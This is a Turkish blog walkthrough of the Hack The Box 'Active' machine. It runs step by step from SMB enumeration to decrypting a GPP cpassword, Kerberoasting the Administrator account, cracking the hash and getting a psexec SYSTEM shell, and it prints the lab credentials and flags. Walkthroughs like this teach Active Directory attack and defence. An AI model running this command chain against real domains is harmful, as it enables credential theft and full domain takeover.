İçeriğe geç

Active

Makine Adı Seviye OS Logo
Active - HTB Kolay Windows

Walkthrough

Nmap taraması ile başlayalım.

Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-27 08:05 EDT
Nmap scan report for 10.10.10.100
Host is up (0.16s latency).
Not shown: 65512 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-27 12:30:55Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49169/tcp open  msrpc         Microsoft Windows RPC
49171/tcp open  msrpc         Microsoft Windows RPC
49182/tcp open  msrpc         Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=7/27%OT=53%CT=1%CU=31977%PV=Y%DS=2%DC=T%G=Y%TM=60FFF9C
OS:F%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=109%TI=I%CI=I%II=I%SS=S%TS=
OS:7)SEQ(SP=105%GCD=1%ISR=109%TI=I%CI=I%II=I%TS=7)OPS(O1=M54BNW8ST11%O2=M54
OS:BNW8ST11%O3=M54BNW8NNT11%O4=M54BNW8ST11%O5=M54BNW8ST11%O6=M54BST11)WIN(W
OS:1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%
OS:O=M54BNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%
OS:T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD
OS:=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S
OS:=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R
OS:=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%
OS:RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 13m01s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-07-27T12:32:20
|_  start_date: 2021-07-27T05:05:54

TRACEROUTE (using port 111/tcp)
HOP RTT       ADDRESS
1   189.49 ms 10.10.16.1
2   73.41 ms  10.10.10.100

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 811.04 seconds

Bir DC olduğu çok belli ve domain adımız: active.htb
Hemen smb ile enum yapmaya başlayalım. enum4linux çıktısında dikkat çekici olan kısımları aşağıda paylaşıyorum.

 ========================================= 
|    Share Enumeration on 10.10.10.100    |
 ========================================= 
[V] Attempting to get share list using authentication
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share 
    Replication     Disk      
    SYSVOL          Disk      Logon server share 
    Users           Disk      
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.10.100
[V] Attempting map to share //10.10.10.100/ADMIN$ with command: smbclient -W '' //'10.10.10.100'/'ADMIN$' -U''%'' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/ADMIN$   Mapping: DENIED, Listing: N/A
[V] Attempting map to share //10.10.10.100/C$ with command: smbclient -W '' //'10.10.10.100'/'C$' -U''%'' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/C$   Mapping: DENIED, Listing: N/A
[V] Attempting map to share //10.10.10.100/IPC$ with command: smbclient -W '' //'10.10.10.100'/'IPC$' -U''%'' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/IPC$ Mapping: OK Listing: DENIED
[V] Attempting map to share //10.10.10.100/NETLOGON with command: smbclient -W '' //'10.10.10.100'/'NETLOGON' -U''%'' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/NETLOGON Mapping: DENIED, Listing: N/A
[V] Attempting map to share //10.10.10.100/Replication with command: smbclient -W '' //'10.10.10.100'/'Replication' -U''%'' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/Replication  Mapping: OK, Listing: OK
[V] Attempting map to share //10.10.10.100/SYSVOL with command: smbclient -W '' //'10.10.10.100'/'SYSVOL' -U''%'' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/SYSVOL   Mapping: DENIED, Listing: N/A
[V] Attempting map to share //10.10.10.100/Users with command: smbclient -W '' //'10.10.10.100'/'Users' -U''%'' -c dir 2>&1
//10.10.10.100/Users    Mapping: DENIED, Listing: N/A

smbmap ile'de kontrol ettiğimizde aynı çıktıları alıyooruz.

┌──(root💀kali)-[~/oscp/htb/Active]
└─# smbmap -u "" -p "" -H 10.10.10.100                                                                                                                                                                                                    2 ⨯
[+] IP: 10.10.10.100:445    Name: unknown                                           
        Disk                                                    Permissions Comment
    ----                                                    ----------- -------
    ADMIN$                                              NO ACCESS   Remote Admin
    C$                                                  NO ACCESS   Default share
    IPC$                                                NO ACCESS   Remote IPC
    NETLOGON                                            NO ACCESS   Logon server share 
    Replication                                         READ ONLY   
    SYSVOL                                              NO ACCESS   Logon server share 
    Users                                               NO ACCESS   

Şimdi smbclient ile içeri girelim ve neler var neler yok bakalım. İçeride group ploicy'ler vardı ve buradan kullanıcı parolası elde edebilir miyim diye düşünmeye başlamıştım. https://adsecurity.org/?p=2288 yazısı bu konuyu açıklamaktadır. Araştırmalarım sonucu kullanıcı verileri buldum.

smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\> cd Groups\
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> ls
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  Groups.xml                          A      533  Wed Jul 18 16:46:06 2018

        10459647 blocks of size 4096. 5727923 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml 
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (0.6 KiloBytes/sec) (average 0.9 KiloBytes/sec)

Bu dosyayı okuduğumuzda SVC_TGS kullanıcısının parolası kırılmayı bekliyordu.


┌──(root💀kali)-[~/oscp/htb/Active]
└─# cat Groups.xml 
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

Yukarıda vermiş olduğum linkte kullanılan ps1 scriptini indirdim ve kalide powershell açıp parolayı kırdım. (https://raw.githubusercontent.com/obscuresec/PowerShell/master/Get-DecryptedCpassword)

┌──(root💀kali)-[~/oscp/htb/Active]
└─# pwsh
PowerShell 7.1.3
Copyright (c) Microsoft Corporation.

https://aka.ms/powershell
Type 'help' to get help.

I
PS /root/oscp/htb/Active> ls   
'a a'   enum4linuxResult   Get-DecryptedCpassword.ps1   GPE.INI   GPT.INI   GptTmpl.inf   Groups.xml
PS /root/oscp/htb/Active> Import-Module ./Get-DecryptedCpassword.ps1
PS /root/oscp/htb/Active> Get-DecryptedCpassword "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18
PS /root/oscp/htb/Active> exit

Artık bir kullanıcıya sahibiz. İçeriye hala giremiyordum bunun üzerine okuyamadığım paylaşılmış klasörleri belki bu kullanıcı ile okurum diye tekrar smb enum yaptım.

 ========================================= 
|    Share Enumeration on 10.10.10.100    |
 ========================================= 
[V] Attempting to get share list using authentication
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share 
    Replication     Disk      
    SYSVOL          Disk      Logon server share 
    Users           Disk      
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.10.100
[V] Attempting map to share //10.10.10.100/ADMIN$ with command: smbclient -W '' //'10.10.10.100'/'ADMIN$' -U'SVC_TGS'%'GPPstillStandingStrong2k18' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/ADMIN$   Mapping: DENIED, Listing: N/A
[V] Attempting map to share //10.10.10.100/C$ with command: smbclient -W '' //'10.10.10.100'/'C$' -U'SVC_TGS'%'GPPstillStandingStrong2k18' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/C$   Mapping: DENIED, Listing: N/A
[V] Attempting map to share //10.10.10.100/IPC$ with command: smbclient -W '' //'10.10.10.100'/'IPC$' -U'SVC_TGS'%'GPPstillStandingStrong2k18' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/IPC$ [E] Can't understand response:
NT_STATUS_INVALID_PARAMETER listing \*
[V] Attempting map to share //10.10.10.100/NETLOGON with command: smbclient -W '' //'10.10.10.100'/'NETLOGON' -U'SVC_TGS'%'GPPstillStandingStrong2k18' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/NETLOGON Mapping: OK, Listing: OK
[V] Attempting map to share //10.10.10.100/Replication with command: smbclient -W '' //'10.10.10.100'/'Replication' -U'SVC_TGS'%'GPPstillStandingStrong2k18' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/Replication  Mapping: OK, Listing: OK
[V] Attempting map to share //10.10.10.100/SYSVOL with command: smbclient -W '' //'10.10.10.100'/'SYSVOL' -U'SVC_TGS'%'GPPstillStandingStrong2k18' -c dir 2>&1
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.10.100/SYSVOL   Mapping: OK, Listing: OK
[V] Attempting map to share //10.10.10.100/Users with command: smbclient -W '' //'10.10.10.100'/'Users' -U'SVC_TGS'%'GPPstillStandingStrong2k18' -c dir 2>&1
//10.10.10.100/Users    Mapping: OK, Listing: OK

Elimizdeki kullaıcıyla daha fazla haklara ahibiz.


┌──(root💀kali)-[~/oscp/htb/Active]
└─# smbmap -u "SVC_TGS" -p "GPPstillStandingStrong2k18" -H 10.10.10.100                                                                                                                                                                   1 ⨯
[+] IP: 10.10.10.100:445    Name: 10.10.10.100                                      
        Disk                                                    Permissions Comment
    ----                                                    ----------- -------
    ADMIN$                                              NO ACCESS   Remote Admin
    C$                                                  NO ACCESS   Default share
    IPC$                                                NO ACCESS   Remote IPC
    NETLOGON                                            READ ONLY   Logon server share 
    Replication                                         READ ONLY   
    SYSVOL                                              READ ONLY   Logon server share 
    Users                                               READ ONLY

İlk flagi böylece almış oldum.

┌──(root💀kali)-[~/oscp/htb/Active]
└─# smbclient -W '' //'10.10.10.100'/'Users' -U'SVC_TGS'%'GPPstillStandingStrong2k18' 2>&1
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sat Jul 21 10:39:20 2018
  ..                                 DR        0  Sat Jul 21 10:39:20 2018
  Administrator                       D        0  Mon Jul 16 06:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 01:06:44 2009
  Default                           DHR        0  Tue Jul 14 02:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 01:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 00:57:55 2009
  Public                             DR        0  Tue Jul 14 00:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 11:16:32 2018

        10459647 blocks of size 4096. 5727623 blocks available
smb: \> cd SVC_TGS\
smb: \SVC_TGS\> ls
  .                                   D        0  Sat Jul 21 11:16:32 2018
  ..                                  D        0  Sat Jul 21 11:16:32 2018
  Contacts                            D        0  Sat Jul 21 11:14:11 2018
  Desktop                             D        0  Sat Jul 21 11:14:42 2018
  Downloads                           D        0  Sat Jul 21 11:14:23 2018
  Favorites                           D        0  Sat Jul 21 11:14:44 2018
  Links                               D        0  Sat Jul 21 11:14:57 2018
  My Documents                        D        0  Sat Jul 21 11:15:03 2018
  My Music                            D        0  Sat Jul 21 11:15:32 2018
  My Pictures                         D        0  Sat Jul 21 11:15:43 2018
  My Videos                           D        0  Sat Jul 21 11:15:53 2018
  Saved Games                         D        0  Sat Jul 21 11:16:12 2018
  Searches                            D        0  Sat Jul 21 11:16:24 2018
cd 
        10459647 blocks of size 4096. 5727623 blocks available
smb: \SVC_TGS\> cd Desktop\
lsmb: \SVC_TGS\Desktop\> ls
  .                                   D        0  Sat Jul 21 11:14:42 2018
  ..                                  D        0  Sat Jul 21 11:14:42 2018
  user.txt                            A       34  Sat Jul 21 11:06:25 2018

        10459647 blocks of size 4096. 5727623 blocks available
smb: \SVC_TGS\Desktop\> get user.txt

┌──(root💀kali)-[~/oscp/htb/Active]
└─# cat user.txt 
86d67d8ba232bb6a254aa4d10159e983

Artık ıkanmıştım ve bloodhound'ı çalıştırdım. LDAP sorguları ile bilgi toplama zamanı.


┌──(root💀kali)-[~/oscp/htb/Active/bloodhound]
└─# bloodhound-python -u SVC_TGS -p GPPstillStandingStrong2k18 -d active.htb  -ns 10.10.10.100  -c all           
INFO: Found AD domain: active.htb
INFO: Connecting to LDAP server: dc.active.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.active.htb
INFO: Found 4 users
INFO: Found 40 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.active.htb

Bloodhound incelemelerimde Administrator kullanıcısının SPN dğeri olduğunu keşfettim. Bunun üzerine hemen hash talebinde bulundum. Ancak hata aldım.

┌──(root💀kali)-[~/oscp/htb/Active]
└─# python3 /root/tool/AD/impacket/examples/GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request                                                                                                                         1 ⨯
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2021-01-21 11:07:03.723783             

[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

Böyle bir hata aldığınızda zaman değerimizi DC ile eşitlelememiz gerekiyor.(https://book.hacktricks.xyz/windows/active-directory-methodology/kerberoast)


┌──(root💀kali)-[~/oscp/htb/Active]
└─# ntpdate 10.10.10.100                
27 Jul 09:51:18 ntpdate[2257]: step time server 10.10.10.100 offset +781.865165 sec

Tekrar deneyelim.


┌──(root💀kali)-[~/oscp/htb/Active]
└─# cat /etc/resolv.conf
nameserver 10.10.10.100

┌──(root💀kali)-[~/oscp/htb/Active]
└─# python3 /root/tool/AD/impacket/examples/GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2021-01-21 11:07:03.723783             

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$27a9be7702cf025d854f726fe25fdffd$a127e1b0d9ed078c32358ae41887465201c909d4e8ce32b95e708b421c53a5b9e290f2a6ba1cdc96d1ce95adf32c8559672c7a2d870c2b6db4f412561dd983cca2fcbc4c065e2a90068d285a3724cdc9231121eed47404dde01dcd2209b86379c13ab5c1d167cc6acd679c827f0ba1e5d5b513050e8bd6d2e7b9a35ae78ed26355832819ac348123cbd1c7269ff328c7c061dc28e743dca66a5d701da71cf7390a6acf00f9d1679d5fc6e7741f71e2d2b3bb751cdaa389756461423e2c8545c116f816a51e8efbbd0fe5b83cee135f9f870889cf9deeedd03da60155e92aa08c8fc73c1a6da5b591972409fe7eaa3d0908e04cde1060c3f8a6e4c5e2d1fac10fa5e2d6e042c054ed186553d1c08606b27fdf2bdaf3962c794c57423d4aecbc7eda24417cb41a125ba13fe4b8a4dfde5c600132f846d25b28d215118db3bb13b21f20d3661e7bd06a4ef1b287bc828303fda8e7e23d415a512b5e274282af3491309a146624d7078a1b7d206b3bc674ee5b0594324c4e2f47fc2594e076c018b41e357d6e28086b9221fa84fe75f2e31230108261fcd1e2e861f850ba13b8bb62f2951d58f0aa35dfec0ac4cbe3c328169fcfdf1af0f58aec8adc4e912b4e94c85f31bc6a322ec583c520ce3951f17da872f021cc2b1a94daa1a223d7151d242617640452b374b79cb0fff429c4a6cf944c6b6565b275bc9ace246fb86fac6f9ecb417a87bb258e848126edda737dbbcaaa7d2c55dfde8c02f0511007b445cbfa93f2cd036081418b08dff899543c875f11810ff730dd0c503c87bd1c1705ceec297a3e62f5f0cfa9a466833799bdd072546686d35010937c27b5f94f22384cd7be16a24920fd58bc6421c45962eddf9b9aaba4c3dc89f5896bf1d9f87bd26b55eac96603de1ad65dd4036b3ba64b1160411946e41a54e088b127f4e17b70f8660bdde4a0adaddbbf4c9f8f262c2e98f7ad66f79c870b9d1f06c0bf5cf19f1386f18f3eec0865c256c54645ec90237b9841cfe5ad0ecea41b7755330b7e065636b96d84c6bdcb66029b8c5327fc32df3a036631bc406f485ea9e919ad0e06c8cc1c1bd3fc8507612c8d4c7af0ce1707fe0bb00966d846202c7116a49aebbbda02e5451693a3f17665a69127c438bfef8c07606e83e468c701d723a18705bfc83d0e4e48bd58464eb20eb6680c1537b7c61ad6a25aefab47605533f0c8fd44acaf98cc002dee0cc221c93148df0ab4a9a330381d04ce891e6588ef

Harika şimdi bunu kıralım.


┌──(root💀kali)-[~/oscp/htb/Active]
└─# john hash --wordlist=/usr/share/wordlists/rockyou.txt                                                                                                                                                                                 1 ⨯
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:04 DONE (2021-07-27 09:52) 0.2132g/s 2246Kp/s 2246Kc/s 2246KC/s Tiffani1432..Thrash1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

┌──(root💀kali)-[~/tool/AD/impacket/examples]
└─# python3 psexec.py Administrator:[email protected]                                
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file ONeZjpOH.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service iDPJ on 10.10.10.100.....
[*] Starting service iDPJ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>cd C:\Users\Administrator\Desktop\

C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 2AF3-72E4

 Directory of C:\Users\Administrator\Desktop

21/01/2021  07:49 úú    <DIR>          .
21/01/2021  07:49 úú    <DIR>          ..
21/07/2018  06:06 úú                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)  23.460.220.928 bytes free

C:\Users\Administrator\Desktop>type root.txt
b5fc76d1d6b91d77b2fbf2d54d0f708b

C:\Users\Administrator\Desktop>
Kategori:Active DirectoryPowerShellWalkthrough

İlk Yorumu Siz Yapın

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir